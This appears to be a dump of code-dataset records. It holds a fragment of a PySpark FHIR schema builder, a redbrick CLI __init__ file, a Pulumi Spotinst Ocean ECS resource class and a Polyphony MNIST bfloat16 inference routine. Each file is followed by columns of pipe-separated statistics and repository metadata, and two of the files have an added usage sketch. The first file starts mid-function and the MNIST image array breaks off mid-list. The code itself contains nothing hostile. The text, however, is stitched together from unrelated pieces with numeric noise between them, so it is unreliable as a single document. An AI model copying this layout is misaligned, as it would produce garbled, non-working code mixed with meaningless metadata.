max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
if not include_modifierExtension:
schema.fields = [
c
if c.name != "modifierExtension"
else StructField("modifierExtension", StringType(), True)
for c in schema.fields
]
return schema
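A hedged usage sketch for the auto-generated schema above, assuming a working PySpark installation and the rest of the spark_fhir_schemas package on the path; the printed field list is indicative only.
if __name__ == "__main__":
    schema = MolecularSequence_QualitySchema.get_schema(
        max_nesting_depth=4,
        max_recursion_limit=1,
        include_extension=False,          # extension columns collapse to plain strings
        include_modifierExtension=False,
    )
    print([field.name for field in schema.fields])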
| 51.61753
| 104
| 0.551984
| 2,524
| 25,912
| 5.431458
| 0.110143
| 0.060398
| 0.038296
| 0.056022
| 0.847837
| 0.844117
| 0.82982
| 0.804143
| 0.798454
| 0.798454
| 0
| 0.005682
| 0.402323
| 25,912
| 501
| 105
| 51.720559
| 0.879512
| 0.29029
| 0
| 0.706215
| 1
| 0
| 0.030067
| 0.005655
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002825
| false
| 0
| 0.022599
| 0
| 0.033898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
70d370d1ddb81ec16b9b23cff266655a1b5944f1
| 182
|
py
|
Python
|
redbrick/cli/entity/__init__.py
|
dereklukacs/redbrick-sdk
|
4cf93444c1d808694c1601334f9e039e616dfd3d
|
[
"MIT"
] | 1
|
2020-11-26T04:25:15.000Z
|
2020-11-26T04:25:15.000Z
|
redbrick/cli/entity/__init__.py
|
redbrick-ai/redbrick-sdk
|
4cf93444c1d808694c1601334f9e039e616dfd3d
|
[
"MIT"
] | 33
|
2021-02-04T17:51:53.000Z
|
2022-03-17T07:28:36.000Z
|
redbrick/cli/entity/__init__.py
|
dereklukacs/redbrick-sdk
|
4cf93444c1d808694c1601334f9e039e616dfd3d
|
[
"MIT"
] | 1
|
2021-06-09T10:06:35.000Z
|
2021-06-09T10:06:35.000Z
|
"""CLI project entities."""
from redbrick.cli.entity.creds import CLICredentials
from redbrick.cli.entity.conf import CLIConfiguration
from redbrick.cli.entity.cache import CLICache
| 36.4
| 53
| 0.82967
| 24
| 182
| 6.291667
| 0.541667
| 0.238411
| 0.298013
| 0.417219
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082418
| 182
| 4
| 54
| 45.5
| 0.904192
| 0.115385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
70d6b100b9ac99e1355b6c01e23766398d5be695
| 19,016
|
py
|
Python
|
sdk/python/pulumi_spotinst/ecs/ocean.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_spotinst/ecs/ocean.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_spotinst/ecs/ocean.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Ocean(pulumi.CustomResource):
associate_public_ip_address: pulumi.Output[bool]
"""
Configure public IP address allocation.
"""
autoscaler: pulumi.Output[dict]
"""
Describes the Ocean ECS autoscaler.
* `cooldown` (`float`) - Cooldown period between scaling actions.
* `down` (`dict`) - Auto Scaling scale down operations.
* `maxScaleDownPercentage` (`float`) - Would represent the maximum % to scale-down. Number between 1-100
* `headroom` (`dict`) - Spare resource capacity management enabling fast assignment of tasks without waiting for new resources to launch.
* `cpuPerUnit` (`float`) - Optionally configure the number of CPUs to allocate the headroom. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
* `memoryPerUnit` (`float`) - Optionally configure the amount of memory (MB) to allocate the headroom.
* `numOfUnits` (`float`) - The number of units to retain as headroom, where each unit has the defined headroom CPU and memory.
* `isAutoConfig` (`bool`) - Automatically configure and optimize headroom resources.
* `isEnabled` (`bool`) - Enable the Ocean ECS autoscaler.
* `resourceLimits` (`dict`) - Optionally set upper and lower bounds on the resource usage of the cluster.
* `maxMemoryGib` (`float`) - The maximum memory in GiB units that can be allocated to the cluster.
* `maxVcpu` (`float`) - The maximum cpu in vCPU units that can be allocated to the cluster.
"""
cluster_name: pulumi.Output[str]
"""
The ocean cluster name.
"""
desired_capacity: pulumi.Output[float]
"""
The number of instances to launch and maintain in the cluster.
"""
draining_timeout: pulumi.Output[float]
"""
The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
"""
ebs_optimized: pulumi.Output[bool]
"""
Enable EBS optimization for the cluster. The flag enables optimized capacity for high-bandwidth connectivity to the EBS service for non-EBS-optimized instance types. For instance types that are EBS-optimized by default, this flag is ignored.
"""
iam_instance_profile: pulumi.Output[str]
"""
The instance profile iam role.
"""
image_id: pulumi.Output[str]
"""
ID of the image used to launch the instances.
"""
key_pair: pulumi.Output[str]
"""
The key pair to attach to the instances.
"""
max_size: pulumi.Output[float]
"""
The upper limit of instances the cluster can scale up to.
"""
min_size: pulumi.Output[float]
"""
The lower limit of instances the cluster can scale down to.
"""
monitoring: pulumi.Output[bool]
"""
Enable detailed monitoring for the cluster. The flag enables CloudWatch detailed monitoring (one-minute increments). Note: there are additional hourly costs for this service based on the region used.
"""
name: pulumi.Output[str]
"""
The Ocean cluster name.
"""
region: pulumi.Output[str]
"""
The region the cluster will run in.
"""
security_group_ids: pulumi.Output[list]
"""
One or more security group ids.
"""
subnet_ids: pulumi.Output[list]
"""
A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto-assign public IP.
"""
tags: pulumi.Output[list]
"""
Optionally adds tags to instances launched in an Ocean cluster.
* `key` (`str`) - The tag key.
* `value` (`str`) - The tag value.
"""
update_policy: pulumi.Output[dict]
user_data: pulumi.Output[str]
"""
Base64-encoded MIME user data to make available to the instances.
"""
utilize_reserved_instances: pulumi.Output[bool]
whitelists: pulumi.Output[list]
"""
Instance types allowed in the Ocean cluster.
"""
def __init__(__self__, resource_name, opts=None, associate_public_ip_address=None, autoscaler=None, cluster_name=None, desired_capacity=None, draining_timeout=None, ebs_optimized=None, iam_instance_profile=None, image_id=None, key_pair=None, max_size=None, min_size=None, monitoring=None, name=None, region=None, security_group_ids=None, subnet_ids=None, tags=None, update_policy=None, user_data=None, utilize_reserved_instances=None, whitelists=None, __props__=None, __name__=None, __opts__=None):
"""
Provides a Spotinst Ocean ECS resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input[dict] autoscaler: Describes the Ocean ECS autoscaler.
:param pulumi.Input[str] cluster_name: The ocean cluster name.
:param pulumi.Input[float] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[float] draining_timeout: The time in seconds the instance is allowed to run while detached from the ELB. This allows the instance time to drain incoming TCP connections before it is terminated during a scale-down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS optimization for the cluster. The flag enables optimized capacity for high-bandwidth connectivity to the EBS service for non-EBS-optimized instance types. For instance types that are EBS-optimized by default, this flag is ignored.
:param pulumi.Input[str] iam_instance_profile: The instance profile iam role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input[str] key_pair: The key pair to attach to the instances.
:param pulumi.Input[float] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[float] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for the cluster. The flag enables CloudWatch detailed monitoring (one-minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: The Ocean cluster name.
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[list] security_group_ids: One or more security group ids.
:param pulumi.Input[list] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto-assign public IP.
:param pulumi.Input[list] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[list] whitelists: Instance types allowed in the Ocean cluster.
The **autoscaler** object supports the following:
* `cooldown` (`pulumi.Input[float]`) - Cooldown period between scaling actions.
* `down` (`pulumi.Input[dict]`) - Auto Scaling scale down operations.
* `maxScaleDownPercentage` (`pulumi.Input[float]`) - The maximum percentage to scale down; a number between 1 and 100.
* `headroom` (`pulumi.Input[dict]`) - Spare resource capacity management enabling fast assignment of tasks without waiting for new resources to launch.
* `cpuPerUnit` (`pulumi.Input[float]`) - Optionally configure the number of CPUs to allocate the headroom. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
* `memoryPerUnit` (`pulumi.Input[float]`) - Optionally configure the amount of memory (MB) to allocate the headroom.
* `numOfUnits` (`pulumi.Input[float]`) - The number of units to retain as headroom, where each unit has the defined headroom CPU and memory.
* `isAutoConfig` (`pulumi.Input[bool]`) - Automatically configure and optimize headroom resources.
* `isEnabled` (`pulumi.Input[bool]`) - Enable the Ocean ECS autoscaler.
* `resourceLimits` (`pulumi.Input[dict]`) - Optionally set upper and lower bounds on the resource usage of the cluster.
* `maxMemoryGib` (`pulumi.Input[float]`) - The maximum memory in GiB units that can be allocated to the cluster.
* `maxVcpu` (`pulumi.Input[float]`) - The maximum cpu in vCPU units that can be allocated to the cluster.
The **tags** object supports the following:
* `key` (`pulumi.Input[str]`) - The tag key.
* `value` (`pulumi.Input[str]`) - The tag value.
The **update_policy** object supports the following:
* `rollConfig` (`pulumi.Input[dict]`)
* `batchSizePercentage` (`pulumi.Input[float]`)
* `shouldRoll` (`pulumi.Input[bool]`)
> This content is derived from https://github.com/terraform-providers/terraform-provider-spotinst/blob/master/website/docs/r/ocean_ecs.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['associate_public_ip_address'] = associate_public_ip_address
__props__['autoscaler'] = autoscaler
if cluster_name is None:
raise TypeError("Missing required property 'cluster_name'")
__props__['cluster_name'] = cluster_name
__props__['desired_capacity'] = desired_capacity
__props__['draining_timeout'] = draining_timeout
__props__['ebs_optimized'] = ebs_optimized
__props__['iam_instance_profile'] = iam_instance_profile
__props__['image_id'] = image_id
__props__['key_pair'] = key_pair
__props__['max_size'] = max_size
__props__['min_size'] = min_size
__props__['monitoring'] = monitoring
__props__['name'] = name
if region is None:
raise TypeError("Missing required property 'region'")
__props__['region'] = region
if security_group_ids is None:
raise TypeError("Missing required property 'security_group_ids'")
__props__['security_group_ids'] = security_group_ids
if subnet_ids is None:
raise TypeError("Missing required property 'subnet_ids'")
__props__['subnet_ids'] = subnet_ids
__props__['tags'] = tags
__props__['update_policy'] = update_policy
__props__['user_data'] = user_data
__props__['utilize_reserved_instances'] = utilize_reserved_instances
__props__['whitelists'] = whitelists
super(Ocean, __self__).__init__(
'spotinst:ecs/ocean:Ocean',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, associate_public_ip_address=None, autoscaler=None, cluster_name=None, desired_capacity=None, draining_timeout=None, ebs_optimized=None, iam_instance_profile=None, image_id=None, key_pair=None, max_size=None, min_size=None, monitoring=None, name=None, region=None, security_group_ids=None, subnet_ids=None, tags=None, update_policy=None, user_data=None, utilize_reserved_instances=None, whitelists=None):
"""
Get an existing Ocean resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input[dict] autoscaler: Describes the Ocean ECS autoscaler.
:param pulumi.Input[str] cluster_name: The ocean cluster name.
:param pulumi.Input[float] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[float] draining_timeout: The time in seconds the instance is allowed to run while detached from the ELB. This allows the instance time to drain incoming TCP connections before it is terminated during a scale-down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS optimization for the cluster. The flag enables optimized capacity for high-bandwidth connectivity to the EBS service for non-EBS-optimized instance types. For instance types that are EBS-optimized by default, this flag is ignored.
:param pulumi.Input[str] iam_instance_profile: The instance profile iam role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input[str] key_pair: The key pair to attach to the instances.
:param pulumi.Input[float] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[float] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for the cluster. The flag enables CloudWatch detailed monitoring (one-minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: The Ocean cluster name.
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[list] security_group_ids: One or more security group ids.
:param pulumi.Input[list] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto-assign public IP.
:param pulumi.Input[list] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[list] whitelists: Instance types allowed in the Ocean cluster.
The **autoscaler** object supports the following:
* `cooldown` (`pulumi.Input[float]`) - Cooldown period between scaling actions.
* `down` (`pulumi.Input[dict]`) - Auto Scaling scale down operations.
* `maxScaleDownPercentage` (`pulumi.Input[float]`) - The maximum percentage to scale down; a number between 1 and 100.
* `headroom` (`pulumi.Input[dict]`) - Spare resource capacity management enabling fast assignment of tasks without waiting for new resources to launch.
* `cpuPerUnit` (`pulumi.Input[float]`) - Optionally configure the number of CPUs to allocate the headroom. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
* `memoryPerUnit` (`pulumi.Input[float]`) - Optionally configure the amount of memory (MB) to allocate the headroom.
* `numOfUnits` (`pulumi.Input[float]`) - The number of units to retain as headroom, where each unit has the defined headroom CPU and memory.
* `isAutoConfig` (`pulumi.Input[bool]`) - Automatically configure and optimize headroom resources.
* `isEnabled` (`pulumi.Input[bool]`) - Enable the Ocean ECS autoscaler.
* `resourceLimits` (`pulumi.Input[dict]`) - Optionally set upper and lower bounds on the resource usage of the cluster.
* `maxMemoryGib` (`pulumi.Input[float]`) - The maximum memory in GiB units that can be allocated to the cluster.
* `maxVcpu` (`pulumi.Input[float]`) - The maximum cpu in vCPU units that can be allocated to the cluster.
The **tags** object supports the following:
* `key` (`pulumi.Input[str]`) - The tag key.
* `value` (`pulumi.Input[str]`) - The tag value.
The **update_policy** object supports the following:
* `rollConfig` (`pulumi.Input[dict]`)
* `batchSizePercentage` (`pulumi.Input[float]`)
* `shouldRoll` (`pulumi.Input[bool]`)
> This content is derived from https://github.com/terraform-providers/terraform-provider-spotinst/blob/master/website/docs/r/ocean_ecs.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["associate_public_ip_address"] = associate_public_ip_address
__props__["autoscaler"] = autoscaler
__props__["cluster_name"] = cluster_name
__props__["desired_capacity"] = desired_capacity
__props__["draining_timeout"] = draining_timeout
__props__["ebs_optimized"] = ebs_optimized
__props__["iam_instance_profile"] = iam_instance_profile
__props__["image_id"] = image_id
__props__["key_pair"] = key_pair
__props__["max_size"] = max_size
__props__["min_size"] = min_size
__props__["monitoring"] = monitoring
__props__["name"] = name
__props__["region"] = region
__props__["security_group_ids"] = security_group_ids
__props__["subnet_ids"] = subnet_ids
__props__["tags"] = tags
__props__["update_policy"] = update_policy
__props__["user_data"] = user_data
__props__["utilize_reserved_instances"] = utilize_reserved_instances
__props__["whitelists"] = whitelists
return Ocean(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
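A minimal usage sketch for the generated Ocean resource above; it is not part of the source file, and the resource name, cluster name, region, security group, and subnet IDs are placeholder values.
# Hypothetical usage of the Ocean resource defined above in a Pulumi program.
# All concrete values below (names, region, IDs) are placeholders, not from the source.
import pulumi
import pulumi_spotinst as spotinst

ocean = spotinst.ecs.Ocean(
    "example-ocean",
    cluster_name="example-ecs-cluster",            # required property
    region="us-west-2",                            # required property
    security_group_ids=["sg-0123456789abcdef0"],   # required property
    subnet_ids=["subnet-0123456789abcdef0"],       # required property
    min_size=0,
    max_size=10,
    desired_capacity=1,
    autoscaler={
        "isEnabled": True,   # camelCase keys as documented in the docstrings above
        "cooldown": 300,
    },
    tags=[{"key": "env", "value": "dev"}],
)

pulumi.export("ocean_cluster_name", ocean.cluster_name)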
| 59.425
| 502
| 0.685265
| 2,399
| 19,016
| 5.241767
| 0.125886
| 0.062982
| 0.04835
| 0.021153
| 0.852962
| 0.833082
| 0.827594
| 0.796024
| 0.772247
| 0.769384
| 0
| 0.002323
| 0.230227
| 19,016
| 319
| 503
| 59.611285
| 0.856743
| 0.467186
| 0
| 0.018349
| 1
| 0
| 0.156193
| 0.021442
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036697
| false
| 0.009174
| 0.055046
| 0.018349
| 0.321101
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb16386c456ac9a5d75980286bd2356667dda8a0
| 8,233
|
py
|
Python
|
mnist_bfloat.py
|
ryos36/polyphony-with-tf-mnist
|
55d2a4006436aa6a9736e56d7fb5bd49c3bc8d91
|
[
"MIT"
] | 1
|
2020-01-21T14:26:06.000Z
|
2020-01-21T14:26:06.000Z
|
mnist_bfloat.py
|
ryos36/polyphony-with-tf-mnist
|
55d2a4006436aa6a9736e56d7fb5bd49c3bc8d91
|
[
"MIT"
] | null | null | null |
mnist_bfloat.py
|
ryos36/polyphony-with-tf-mnist
|
55d2a4006436aa6a9736e56d7fb5bd49c3bc8d91
|
[
"MIT"
] | null | null | null |
import polyphony
from polyphony import testbench
from polyphony import __python__
from polyphony import unroll
from polyphony.typing import List, bit16
import bfloat
from b_bin import B_PARAM
from w_bin import W_PARAM
from img7 import IMAGE7
#polyphony.__path__.append('./polyphony')
#from polyphony.soc import offload, intern_symbol
LEN=28*28
#@offload
def do_mnist7_mem(a:List[bit16], _mem:List[bit16], lst_len = LEN):
rom_w = W_PARAM
rom_b = B_PARAM
mem = [0] * 10
xi = 0
for i in range(lst_len):
x = a[i]
for j in unroll(range(10)):
mem[j] = bfloat.mul_add(x, rom_w[xi + j], mem[j])
xi += 10
for j in range(10):
_mem[j] = bfloat.add(mem[j], rom_b[j])
@testbench
def test():
img = [0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x3ea8, 0x3f39, 0x3f1f, 0x3f17, 0x3e70, 0x3e10,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3f5e, 0x3f7e,
0x3f7e, 0x3f7e, 0x3f7e, 0x3f71, 0x3f46, 0x3f46, 0x3f46, 0x3f46,
0x3f46, 0x3f46, 0x3f46, 0x3f46, 0x3f2a, 0x3e50, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x3e86, 0x3ee4, 0x3e90, 0x3ee4, 0x3f23, 0x3f63,
0x3f7e, 0x3f61, 0x3f7e, 0x3f7e, 0x3f7e, 0x3f7a, 0x3f65, 0x3f7e,
0x3f7e, 0x3f0c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x3d88, 0x3e84, 0x3d60, 0x3e86, 0x3e86,
0x3e86, 0x3e6c, 0x3da8, 0x3f6c, 0x3f7e, 0x3ed4, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3ea6, 0x3f7d,
0x3f51, 0x3d90, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x3db0, 0x3f69, 0x3f80, 0x3ea6, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3f01, 0x3f7e, 0x3f6e,
0x3e30, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x3e6c, 0x3f79, 0x3f7e, 0x3e78, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x3f05, 0x3f7e, 0x3f3b, 0x3ca0,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3d10,
0x3f4d, 0x3f78, 0x3e68, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x3efc, 0x3f7e, 0x3f36, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3e96, 0x3f7b,
0x3f70, 0x3e64, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x3d98, 0x3f5d, 0x3f7e, 0x3f26, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x3c40, 0x3f4b, 0x3f7e, 0x3f5b,
0x3e0c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x3e18, 0x3f7e, 0x3f7e, 0x3e9a, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x3df8, 0x3f60, 0x3f7e, 0x3ee6, 0x3b80,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3f05,
0x3f7e, 0x3f7e, 0x3e50, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x3e74, 0x3f72, 0x3f7e, 0x3f7e, 0x3e50, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3ef2, 0x3f7e,
0x3f7e, 0x3f5b, 0x3e20, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x3ef2, 0x3f7e, 0x3f4f, 0x3d90, 0x0000, 0x0000,
